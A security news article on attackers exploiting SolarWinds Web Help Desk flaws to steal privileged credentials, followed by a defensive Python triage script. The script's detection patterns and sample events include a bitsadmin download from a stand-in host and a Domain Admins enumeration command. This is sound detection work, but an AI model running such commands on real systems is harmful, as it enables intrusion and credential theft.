SolarWinds WHD Under Attack: Critical Vulnerabilities Exploited to Steal High-Privilege Credentials (2026)

Date: 2026-03-08

SolarWinds Web Help Desk (WHD) has been under attack, with intruders exploiting vulnerabilities to steal high-privilege credentials. The attackers remain unknown, and the exact method of exploitation is still unclear. Microsoft researchers have identified two critical vulnerabilities in WHD: CVE-2025-40551 and CVE-2025-40536, both of which could allow remote code execution and unauthorized access. However, the threat hunters cannot confirm whether these vulnerabilities were the primary entry points, because the attacks occurred in December 2025 on machines vulnerable to both old and new CVEs. SolarWinds has also patched CVE-2025-26399, a critical flaw that allowed remote attackers to run commands on host machines, but it took three attempts to get the patch right.

The attackers used a technique known as "living off the land", abusing legitimate Windows features such as BITS (Background Intelligent Transfer Service) for payload download and execution. They also installed Zoho ManageEngine, a remote monitoring tool, to gain long-term control. The intruders enumerated sensitive domain users and groups, established reverse SSH and RDP access, and used DLL sideloading to steal credentials.

Security experts advise applying the WHD patches and removing public access to admin paths. Security teams should also scan for and remove unauthorized RMM tools and rotate credentials, especially for service and admin accounts accessible via WHD.
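The following triage sketch is an added example, not part of the original article or of Microsoft's or SolarWinds' guidance. It flags the behaviours described above (BITS downloads, an unapproved RMM tool, domain enumeration, reverse SSH) in process-creation events from WHD hosts. The host names, file names, URL, regular expressions and Sysmon-style field names are assumptions constructed for illustration.

```python
import re

# Hosts running Web Help Desk (constructed name; replace with your inventory).
WHD_HOSTS = {"whd-prod-01"}
# RMM products approved for these hosts (assumption: none).
APPROVED_RMM = set()
# Keyword -> product label; extend for the RMM tools relevant to your estate.
RMM_KEYWORDS = {"manageengine": "Zoho ManageEngine"}

RULES = [  # illustrative heuristics, not vendor-published signatures
    ("bits_download", re.compile(r"bitsadmin(\.exe)?\b.*/transfer|Start-BitsTransfer", re.I)),
    ("domain_enumeration", re.compile(r"\bnet1?(\.exe)?\s+(group|user)\b.*/domain", re.I)),
    ("reverse_ssh", re.compile(r"(?i:\bssh(\.exe)?\b).*\s-R\s")),
]

def triage(events):
    """Return (host, rule, command line) findings for events on WHD hosts."""
    findings = []
    for ev in events:
        if ev["Computer"] not in WHD_HOSTS:
            continue  # only the help desk servers are in scope here
        text = f'{ev["Image"]} {ev["CommandLine"]}'
        for name, pattern in RULES:
            if pattern.search(text):
                findings.append((ev["Computer"], name, ev["CommandLine"]))
        for keyword, product in RMM_KEYWORDS.items():
            if keyword in text.lower() and product not in APPROVED_RMM:
                findings.append((ev["Computer"], f"unapproved_rmm:{product}", ev["CommandLine"]))
    return findings

# Constructed sample events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Computer": "whd-prod-01", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 https://files.example.invalid/a.bin C:\Users\Public\a.bin"},
    {"Computer": "whd-prod-01", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\Public\ManageEngine_Agent.msi /qn"},
    {"Computer": "whd-prod-01", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": 'net group "Domain Admins" /domain'},
    {"Computer": "whd-prod-01", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
    {"Computer": "ws-114", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /list"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Findings are leads for investigation rather than verdicts: legitimate administration can trigger the same patterns, so review each hit against change records before acting.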

Article information

Author: Twana Towne Ret
